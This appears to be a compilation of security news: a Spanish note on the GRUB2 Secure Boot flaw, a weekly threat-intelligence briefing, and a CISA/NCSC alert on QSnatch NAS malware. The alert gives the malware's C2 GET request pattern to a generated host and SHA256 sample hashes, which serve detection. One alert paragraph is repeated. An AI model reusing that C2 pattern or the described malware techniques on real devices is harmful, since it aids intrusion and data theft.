Se encontró una falla en las versiones previas a 2.06 de grub2. Un atacante puede usar la falla en GRUB 2 para secuestrar y manipular el proceso de verificación de GRUB. Esta falla también permite eludir las protecciones de arranque seguro (Secure Boot). Para poder cargar un kernel no confiable o modificado, un atacante primero necesitaría disponer de acceso al sistema, como obtener acceso físico, tener la posibilidad de alterar una red «pxe-boot» o tener acceso remoto a un sistema en la red con acceso de root. Con este acceso, un atacante podría forjar una cadena para causar un desbordamiento del búfer inyectando una carga maliciosa, que conduzca a la ejecución de código arbitrario dentro de GRUB. La mayor amenaza de esta vulnerabilidad es la confidencialidad e integridad de los datos, así como la disponibilidad del sistema.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

Según el reporte de BleepingComputer, ha compartido la vulnerabilidad con los proveedores de sistemas operativos, los fabricantes de computadoras y los CERT/CSIRT. Se espera que hoy mismo se publiquen avisos y mitigaciones posibles de múltiples organizaciones en la industria.

Vemos el problema con baja probabilidad de ocurrencia o al menos con alta dificultad, pues como se indica en la cita del CVE, requiere condiciones especiales para llegar a explotar la vulnerabilidad. Esto no significa que nos podamos despreocupar, más bien debemos estar muy pendientes de las actualizaciones que irán llegando de los diferentes fabricantes.

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Data breach, Colbalt Strike, Lazarus, Misconfigured Tools, and OilRig. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. 916000.png

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cerberus Banking Trojan Team Breaks Up, Source Code Goes to Auction

(published: July 27, 2020)

Android banking trojan, Cerberus has been put up for sale by the malware’s developer. The trojan, which uses overlays to phish banking credentials from users, has been listed with a starting price of $50,000. The operator of Cerberus claims the purchaser will receive the source code, module code, admin panel code, along with the current customer database with a monthly profit of $10,000. The sale of Cerberus is allegedly due to the development team breaking up.Recommendation: Users should be cautious when downloading Android applications, with malicious apps occasionally bypassing Google Play Store protections. It is crucial that all permissions of an application be examined prior to download.Tags: Android Malware, Cerberus, Mobile Malware

Source Code from Dozens of Companies Leaked Online

(published: July 27, 2020)

Source code from a wide range of companies have been leaked due to misconfigured tools. Identified by Tillie Kottmann, the companies include Adobe, Disney, Lenovo, Microsoft, Motorola, Nintendo, among many others. Within the source code the developers’ names, along with hardcoded credentials have been found.Recommendation: It is crucial for your company to verify that access control is configured correctly prior to adding any sensitive data. As this story portrays, a misconfigured software can cause leaks of sensitive information, which could be used for further malicious activity, and cause significant harm to a company’s reputation.Tags: Misconfigured tools, Data breach

Dave Data Breach Affects 7.5 Million Users, Leaked on Hacker Forum

(published: July 26, 2020)

Dave, a fintech company that offers overdraft protection, has suffered a data breach. The breach occurred when threat actors gained access to third-party provider Waydev, which enabled access to user data at Dave. The database contained over seven million user records which included addresses birth dates, email addresses, names, and phone numbers. The actor who stole the database first attempted to sell the breach on a hacker forum, however, they ended up releasing the database for free on another site.Recommendation: Dave is requiring all users to do a password reset, however, users need to be aware they are still at risk if they are using the same password for other sites as well.Tags: Data breach, PII, Third party breach

Russia’s GRU Hackers Hit US Government and Energy Targets

(published: July 24, 2020)

The Federal Bureau of Investigations (FBI) and FireEye both have confirmed a series of campaigns by the Russian GRU associated APT28, aka Fancy Bear. These attacks began in December of 2018 and continued until at least May 2020. The initial vector appears to be spearphishing attacks against a number of US Government, energy, and education organizations. One confirmed victim did not find any evidence of successful phishing but did confirm that attackers had stolen multiple mailboxes from their email servers. Other initial attack vectors include password spaying and brute force. The long term motivation behind these attacks is not clear, but are likely a variation of the past motives of APT28, including US election meddling, and retaliatory attacks against the Olympic Anti-Doping Agency. The broadening of attacks to the US Energy Sector is especially troubling as APT28 is believed to have been behind previous attacks against US and Ukrainian Energy infrastructure and Industry Control Systems (ICS).Recommendation: Defense in-depth, along with well designed and regular employee training is critical to all businesses but especially important for governments and industries. Entities responsible for ICS systems need to be aware of the security issues and vulnerabilities in these systems, and they should never be connected to the internet.Tags: APT28, FancyBear, government, energy sector, spear-phishing

Chinese DJI Drones Come With Backdoor

(published: July 24, 2020)

Researchers from Synacktiv and GRIMM have released reports detailing security issues found within the DJI drone app. Developed by Chinese drone manufacturer Da Jiang Innovations, the app comes with an auto-update function that bypasses the Google Play Store, this function could be used to install malicious software on an Android device and send sensitive information directly to DJI’s servers. The app requests significant permissions (contacts, microphone, camera, location, storage, change network connectivity) and collects a user’s IMSI, IMEI and the serial number of the SIM card used, arguably the servers have almost full control of a users phone exhibiting similarities to a malware C&C server. The app also uses auto-debugging and encryption techniques to stop security researchers. DJI has disputed these claims, calling the findings “typical software concerns” and argued that the US DHS had found no evidence of suspicious data transmission.Recommendation: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.Tags: Android, drone, backdoor

Garmin Suffers Potential Ransomware Attack

(published: July 24, 2020)

Garmin’s services and applications have been experiencing outages over the previous week and reports of a ransomware attack are beginning to surface. Garmin confirmed that its website and mobile app were both down while also sending notes to its Taiwanese factories that there would be, “two days of planned maintenance.” Researchers from SentinelOne noticed that these outages appeared to correlate with a WastedLocker attack against the company, several employees likewise alleged that Garmin had suffered an attack from WastedLocker. WastedLocker is ransomware believed to have been developed by the Russian group Evil Corp, better known for their Dridex and Bitpaymer attacks. Garmin has currently not commented on a potential attack.Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of ransomware infection.MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486Tags: Garmin, ransomware, Evil Corp, WastedLocker, cybercrime,

MATA: Multi-platform Targeted Malware Framework

(published: July 22, 2020)

Security researchers from Kaspersky have identified a new malware framework called “MATA” that targets Windows, Linux, and macOS operating systems. Researchers believe the malware framework is linked to North Korea based Lazarus APT group. The framework has been used by the threat actors since April 2018 and targeted entities in Poland, Germany, Turkey, Korea, Japan, and India. The targeted industries include a software company, an e-commerce provider, and an Internet Service Provider (ISP). The actors used MATA to perform various objectives on their victims like distributing VHD ransomware and querying victim databases for acquiring customer lists. Analysis revealed that a variant of Manuscrypt malware distributed by Lazarus also shares a similar configuration structure with MATA.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: Lazarus, MATA

OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory

(published: July 22, 2020)

Palo Alto’s Unit42 discovered a variant of an OilRig-associated tool we call RDAT using a novel email-based command and control (C2) channel that relied on a technique known as steganography to hide commands and data within bitmap images attached to emails.Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.Tags: OilRig, Middle East, Email, C2

Chinese APT Targets India and Hong Kong with Updated MgBot

(published: July 21, 2020)

Researchers from Malwarebytes have released a report detailing the targeting of Indian and Hong Kong entities by an unnamed Chinese APT group. A spearphishing campaign spoofing as an email from the Indian Government Information Security Center was observed targeting Indian government personnel. Once the attached .rar file was downloaded, it would inject a Cobalt Strike variant into the system. Other lure documents themed around Hong Kong immigration to the UK were discovered dropping an updated MgBot loader before injecting Remote Access Trojan (RAT) through the AppMgmt Service on Windows. The RAT’s strings are either obfuscated or use XOR encoding making analysis difficult. The targeting by a Chinese APT is likely due to the current climate between China and India as well as the political tensions in Hong Kong. Malwarebytes believes the actor shares TTPs with well-known Chinese groups such as Rancor, KeyBoy, and APT40; while still not offering attribution, the analysts believe this APT group has been active since 2014 continuously using variants of MgBot throughout.Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.MITRE ATT&CK: [MITRE PRE-ATT&CK] Spearphishing for Information – T1397 | [MITRE ATT&CK] Access Token Manipulation – T1134 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] BITS Jobs – T1197 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Obfuscated Files or Information – T1027Tags: China, APT, MgBot, Cobalt Strike, India, Hong Kong, spearphishing, lure

Golden Chickens: Evolution Of The MaaS

(published: July 20, 2020)

Researchers from QuoIntelligence observed four new attacks utilizing the tools from e-crime group Golden Chickens who provide Malware-as-a-Service (MaaS) throughout March and April. Researchers attributed each attack with confidence varying from low to moderate to groups GC05, GC06.tmp, and FIN6. During the analysis, it was found that the Golden Chickens group has updated its tools such as TerraLoader, more_eggs, and VenomLNK with new features that incorporate anti-analysis techniques, new string obfuscation and brute force implementation. Golden Chickens MaaS remains as a preferred service provider for top-tier e-crime groups such as FIN6 and Cobalt Group.Recommendation: Financially themed malspam emails are a common tactic among threat actors, therefore, it is crucial that your employees are aware of their financial institutions’ policies regarding electron communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.MITRE ATT&CK: [MITRE ATT&CK] Regsvr32 – T1117 | [MITRE ATT&CK] Code Signing – T1116 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] Remote File Copy – T1105 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] Standard Cryptographic Protocol – T1032 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel – T1041 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] CMSTP – T1191Tags: Terra loader, Golden chickens

Original release date: July 27, 2020Summary

This is a joint alert from the United States Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).

CISA and NCSC are investigating a strain of malware known as QSnatch, which attackers used in late 2019 to target Network Attached Storage (NAS) devices manufactured by the firm QNAP.  

All QNAP NAS devices are potentially vulnerable to QSnatch malware if not updated with the latest security fixes. The malware, documented in open-source reports, has infected thousands of devices worldwide with a particularly high number of infections in North America and Europe. Further, once a device has been infected, attackers can prevent administrators from successfully running firmware updates.

This alert summarizes the findings of CISA and NCSC analysis and provides mitigation advice.

Technical DetailsCampaigns  

CISA and NCSC have identified two campaigns of activity for QSnatch malware. The first campaign likely began in early 2014 and continued until mid-2017, while the second started in late 2018 and was still active in late 2019. The two campaigns are distinguished by the initial payload used as well as some differences in capabilities. This alert focuses on the second campaign as it is the most recent threat.  

It is important to note that infrastructure used by the malicious cyber actors in both campaigns is not currently active, but the threat remains to unpatched devices.  

Although the identities and objectives of the malicious cyber actors using QSnatch are currently unknown, the malware is relatively sophisticated, and the cyber actors demonstrate an awareness of operational security.

Global distribution of infections  

Analysis shows a significant number of infected devices. In mid-June 2020, there were approximately 62,000 infected devices worldwide; of these, approximately 7,600 were in the United States and 3,900 were in the United Kingdom. Figure 1 below shows the location of these devices in broad geographic terms.

Figure 1: Location QNAP NAS devices infected by QSnatch

Delivery and exploitation

The infection vector has not been identified, but QSnatch appears to be injected into the device firmware during the infection stage, with the malicious code subsequently run within the device, compromising it. The attacker then uses a domain generation algorithm (DGA)—to establish a command and control (C2) channel that periodically generates multiple domain names for use in C2 communications—using the following HTTP GET request:

HTTP GET https://[generated-address]/qnap_firmware.xml?=t[timestamp][1]

Malware functionalities  

Analysis shows that QSnatch malware contains multiple functionalities, such as:  

CGI password logger  

This installs a fake version of the device admin login page, logging successful authentications and passing them to the legitimate login page.

Credential scraper
SSH backdoor  
This allows the cyber actor to execute arbitrary code on a device.

Exfiltration
When run, QSnatch steals a predetermined list of files, which includes system configurations and log files. These are encrypted with the actor’s public key and sent to their infrastructure over HTTPS.

Webshell functionality for remote access
Persistence

The malware appears to gain persistence by preventing updates from installing on the infected QNAP device. The attacker modifies the system host’s file, redirecting core domain names used by the NAS to local out-of-date versions so updates can never be installed.  

Samples

The following tables provide hashes of related QSnatch samples found in open-source malware repositories. File types fall into two buckets: (1) shell scripts (see table 1) and (2) shell script compiler (SHC)-compiled executable and linking format (ELF) shell scripts (see table 2). One notable point is that some samples intentionally patch the infected QNAP for Samba remote code execution vulnerability CVE-2017-7494.  

Samples

The following tables provide hashes of related QSnatch samples found in open-source malware repositories. File types fall into two buckets: (1) shell scripts (see table 1) and (2) shell script compiler (SHC)-compiled executable and linking format (ELF) shell scripts (see table 2). One notable point is that some samples intentionally patch the infected QNAP for Samba remote code execution vulnerability CVE-2017-7494.  

Table 1: QSnatch samples – shell scripts

SH Samples (SHA256)
09ab3031796bea1b8b79fcfd2b86dac8f38b1f95f0fce6bd2590361f6dcd6764
3c38e7bb004b000bd90ad94446437096f46140292a138bfc9f7e44dc136bac8d
8fd16e639f99cdaa7a2b730fc9af34a203c41fb353eaa250a536a09caf78253b
473c5df2617cee5a1f73880c2d66ad9668eeb2e6c0c86a2e9e33757976391d1a
55b5671876f463f2f75db423b188a1d478a466c5e68e6f9d4f340396f6558b9f
9526ccdeb9bf7cfd9b34d290bdb49ab6a6acefc17bff0e85d9ebb46cca8b9dc2
4b514278a3ad03f5efb9488f41585458c7d42d0028e48f6e45c944047f3a15e9
fa3c2f8e3309ee67e7684abc6602eea0d1d18d5d799a266209ce594947269346
18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
9791c5f567838f1705bd46e880e38e21e9f3400c353c2bf55a9fa9f130f3f077
a569332b52d484f40b910f2f0763b13c085c7d93dcdc7fea0aeb3a3e3366ba5d
a9364f3faffa71acb51b7035738cbd5e7438721b9d2be120e46b5fd3b23c6c18
62426146b8fcaeaf6abb24d42543c6374b5f51e06c32206ccb9042350b832ea8
5cb5dce0a1e03fc4d3ffc831e4a356bce80e928423b374fc80ee997e7c62d3f8
5130282cdb4e371b5b9257e6c992fb7c11243b2511a6d4185eafc0faa0e0a3a6
15892206207fdef1a60af17684ea18bcaa5434a1c7bdca55f460bb69abec0bdc
3cb052a7da6cda9609c32b5bafa11b76c2bb0f74b61277fecf464d3c0baeac0e
13f3ea4783a6c8d5ec0b0d342dcdd0de668694b9c1b533ce640ae4571fdbf63c

 

Table 2: QSnatch samples – SHC-compiled ELF shell scripts

SH Samples (SHA256)
18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
3615f0019e9a64a78ccb57faa99380db0b36146ec62df768361bca2d9a5c27f2
845759bb54b992a6abcbca4af9662e94794b8d7c87063387b05034ce779f7d52
6e0f793025537edf285c5749b3fcd83a689db0f1c697abe70561399938380f89
Mitigations

As stated above, once a device has been infected, attackers have been known to make it impossible for administrators to successfully run the needed firmware updates. This makes it extremely important for organizations to ensure their devices have not been previously compromised. Organizations that are still running a vulnerable version must run a full factory reset on the device prior to completing the firmware upgrade to ensure the device is not left vulnerable.

The usual checks to ensure that the latest updates are installed still apply. To prevent reinfection, this recommendation also applies to devices previously infected with QSnatch but from which the malware has been removed.

To prevent QSnatch malware infections, CISA and NCSC strongly recommend that organizations take the recommended measures in QNAP’s November 2019 advisory.[2]

CISA and NCSC also recommend organizations consider the following mitigations:  

Verify that you purchased QNAP devices from reputable sources.  
If sources are in question, run a full factory reset on the device prior to completing the firmware upgrade. For additional supply chain recommendations, see CISA’s tip on Securing Network Infrastructure Devices.

Block external connections when the device is intended to be used strictly for internal storage.
References
[1] QSnatch – Malware designed for QNAP NAS devices [2] QNAP: Security Advisory for Malware QSnatch Revisions
July 27, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

MAR-17-352-01 HatMan—Safety System Targeted Malware. This malware analysis report discusses the components and capabilities of the HatMan malware and some potential mitigations. Media reporting also refers to this malware as both TRITON and TRISIS.